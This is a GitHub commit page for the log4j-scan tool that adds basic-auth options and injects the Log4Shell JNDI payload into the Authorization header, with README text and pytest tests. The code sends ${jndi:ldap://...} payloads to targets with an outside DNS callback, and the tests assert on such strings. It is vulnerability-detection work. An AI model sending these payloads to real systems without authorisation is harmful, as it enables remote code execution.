Skip to content
This repository has been archived by the owner on Mar 2, 2022. It is now read-only.

Commit

Permalink
Fix fullhunt#81 : Basic auth + "Authorization header injection" support
Browse files Browse the repository at this point in the history
  • Loading branch information
axel3rd committed Dec 23, 2021
1 parent a306204 commit a3ce413
Show file tree
Hide file tree
Showing 3 changed files with 97 additions and 8 deletions.
7 changes: 7 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -40,6 +40,7 @@ $ python3 log4j-scan.py -h
[•] Secure your External Attack Surface with FullHunt.io.
usage: log4j-scan.py [-h] [-u URL] [-l USEDLIST] [--request-type REQUEST_TYPE] [--headers-file HEADERS_FILE] [--run-all-tests] [--exclude-user-agent-fuzzing]
[--wait-time WAIT_TIME] [--waf-bypass] [--dns-callback-provider DNS_CALLBACK_PROVIDER] [--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST]
[--basic-auth-user USER] [--basic-auth-password PASSWORD] [--authorization-injection INJECTION_TYPE] [--disable-http-redirects]

optional arguments:
-h, --help show this help message and exit
Expand All @@ -65,6 +66,12 @@ optional arguments:
DNS Callback provider (Options: dnslog.cn, interact.sh) - [Default: interact.sh].
--custom-dns-callback-host CUSTOM_DNS_CALLBACK_HOST
Custom DNS Callback Host.
--basic-auth-user USER
Preemptive basic authentication user.
--basic-auth-password PASSWORD
Preemptive basic authentication password.
--authorization-injection INJECTION_TYPE
Authorization injection type: (basic) - [Default: none].
--disable-http-redirects
Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.
```
Expand Down
39 changes: 34 additions & 5 deletions log4j-scan.py
Original file line number Diff line number Diff line change
Expand Up @@ -23,6 +23,7 @@
from Crypto.PublicKey import RSA
from Crypto.Hash import SHA256
from termcolor import cprint
from requests.auth import HTTPBasicAuth

# Disable SSL warnings
try:
Expand Down Expand Up @@ -111,15 +112,28 @@ def parse_args(args_input):
dest="custom_dns_callback_host",
help="Custom DNS Callback Host.",
action='store')
parser.add_argument("--basic-auth-user",
dest="basic_auth_user",
help="Preemptive basic authentication user.",
action='store')
parser.add_argument("--basic-auth-password",
dest="basic_auth_password",
help="Preemptive basic authentication password.",
action='store')
parser.add_argument("--authorization-injection",
dest="authorization_injection_type",
help="Authorization injection type: (basic) - [Default: none].",
default="none",
action='store')
parser.add_argument("--disable-http-redirects",
dest="disable_redirects",
help="Disable HTTP redirects. Note: HTTP redirects are useful as it allows the payloads to have higher chance of reaching vulnerable systems.",
action='store_true')
action='store_true')

return parser.parse_args(args_input)


def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing):
def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing, authorization_injection_type):
fuzzing_headers = {}
fuzzing_headers.update(default_headers)
with open(headers_file, "r") as f:
Expand All @@ -130,6 +144,8 @@ def get_fuzzing_headers(payload, headers_file, exclude_user_agent_fuzzing):
fuzzing_headers.update({i: payload})
if exclude_user_agent_fuzzing:
fuzzing_headers["User-Agent"] = default_headers["User-Agent"]
if authorization_injection_type == 'basic':
fuzzing_headers["Authorization"] = 'Basic %s' % base64.b64encode((payload + ':fakepassword').encode('utf-8')).decode()

fuzzing_headers["Referer"] = f'https://{fuzzing_headers["Referer"]}'
return fuzzing_headers
Expand Down Expand Up @@ -279,14 +295,19 @@ def scan_url(url, callback_host, proxies, args):
cprint(f"[•] Scanning for CVE-2021-45046 (Log4j v2.15.0 Patch Bypass - RCE)", "yellow")
payloads = get_cve_2021_45046_payloads(f'{parsed_url["host"]}.{callback_host}', random_string)

auth = None
if args.basic_auth_user:
auth = HTTPBasicAuth(args.basic_auth_user, args.basic_auth_password)

for payload in payloads:
cprint(f"[•] URL: {url} | PAYLOAD: {payload}", "cyan")
if args.request_type.upper() == "GET" or args.run_all_tests:
try:
requests.request(url=url,
method="GET",
auth=auth,
params={"v": payload},
headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing),
headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type),
verify=False,
timeout=timeout,
allow_redirects=(not args.disable_redirects),
Expand All @@ -299,8 +320,9 @@ def scan_url(url, callback_host, proxies, args):
# Post body
requests.request(url=url,
method="POST",
auth=auth,
params={"v": payload},
headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing),
headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type),
data=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
Expand All @@ -313,8 +335,9 @@ def scan_url(url, callback_host, proxies, args):
# JSON body
requests.request(url=url,
method="POST",
auth=auth,
params={"v": payload},
headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing),
headers=get_fuzzing_headers(payload, args.headers_file, args.exclude_user_agent_fuzzing, args.authorization_injection_type),
json=get_fuzzing_post_data(payload),
verify=False,
timeout=timeout,
Expand Down Expand Up @@ -347,6 +370,12 @@ def main(options):
continue
urls.append(i)

if args.basic_auth_user:
cprint(f"[•] Using preemptive basic authentication with user [{args.basic_auth_user}].")
if not args.basic_auth_password:
raise ValueError("'--basic-auth-password' is mandatory when basic authentication user is defined.")
if args.authorization_injection_type != 'none':
raise ValueError("'--authorization-injection' is not compatible when basic authentication is defined.")
dns_callback_host = ""
if args.custom_dns_callback_host:
cprint(f"[•] Using custom DNS Callback host [{args.custom_dns_callback_host}]. No verification will be done after sending fuzz requests.")
Expand Down
59 changes: 56 additions & 3 deletions tests/test_log4j_scan.py
Original file line number Diff line number Diff line change
@@ -1,7 +1,13 @@
import re
import importlib
import base64
import pytest
import requests_mock
import importlib
log4j_scan = importlib.import_module("log4j-scan", package='..')

LOCALHOST = 'https://localhost/'
DNS_CUSTOM = 'custom.dns.callback'


def test_args_required(capsys):
log4j_scan.main([])
Expand All @@ -12,9 +18,9 @@ def test_args_required(capsys):
def test_default(requests_mock, capsys):
adapter_dns_register = requests_mock.post('https://interact.sh/register', text='success')
adapter_dns_save = requests_mock.get('https://interact.sh/poll', json={'data': [], 'extra': None, 'aes_key': 'FAKE'})
adapter_endpoint = requests_mock.get('https://localhost/')
adapter_endpoint = requests_mock.get(LOCALHOST)

log4j_scan.main(['-u', 'https://localhost/'])
log4j_scan.main(['-u', LOCALHOST])

captured = capsys.readouterr()

Expand All @@ -25,4 +31,51 @@ def test_default(requests_mock, capsys):
assert 'Targets does not seem to be vulnerable' in captured.out
assert 'jndi' in adapter_endpoint.last_request.url
assert re.match(r'\${jndi:ldap://localhost\..*.interact\.sh/.*}', adapter_endpoint.last_request.headers['User-Agent'])
assert 'Authorization' not in adapter_endpoint.last_request.headers


def test_custom_dns_callback_host(requests_mock):
adapter_endpoint = requests_mock.get(LOCALHOST)

log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM ])

assert adapter_endpoint.call_count == 1
assert re.match(r'\${jndi:ldap://localhost\.custom.dns.callback/.*}', adapter_endpoint.last_request.headers['User-Agent'])


def test_authentication_basic_no_password():
with pytest.raises(Exception) as ex:
log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--basic-auth-user', 'foo' ])
assert "'--basic-auth-password' is mandatory when basic authentication user is defined." == str(ex.value)


def test_authentication_basic(requests_mock):
adapter_endpoint_get = requests_mock.get(LOCALHOST)
adapter_endpoint_post = requests_mock.post(LOCALHOST)

log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--basic-auth-user', 'foo', '--basic-auth-password', 'bar', '--run-all-tests'])

assert adapter_endpoint_get.call_count == 1
assert adapter_endpoint_post.call_count == 2

_basic_auth_encoded = 'Basic Zm9vOmJhcg=='
assert _basic_auth_encoded == adapter_endpoint_get.last_request.headers['Authorization']
assert _basic_auth_encoded == adapter_endpoint_post.request_history[0].headers['Authorization']
assert _basic_auth_encoded == adapter_endpoint_post.request_history[1].headers['Authorization']


def test_authentication_injection_basic_with_user():
with pytest.raises(Exception) as ex:
log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--authorization-injection', 'basic', '--basic-auth-user', 'foo', '--basic-auth-password', 'bar' ])
assert "'--authorization-injection' is not compatible when basic authentication is defined." == str(ex.value)


def test_authentication_injection_basic(requests_mock):
adapter_endpoint = requests_mock.get(LOCALHOST)

log4j_scan.main(['-u', LOCALHOST, '--custom-dns-callback-host', DNS_CUSTOM, '--authorization-injection', 'basic'])

assert adapter_endpoint.call_count == 1
_basic_auth = 'Basic %s' % base64.b64encode((adapter_endpoint.last_request.headers['User-Agent'] + ':fakepassword').encode('utf-8')).decode()
assert _basic_auth == adapter_endpoint.last_request.headers['Authorization']

0 comments on commit a3ce413

Please sign in to comment.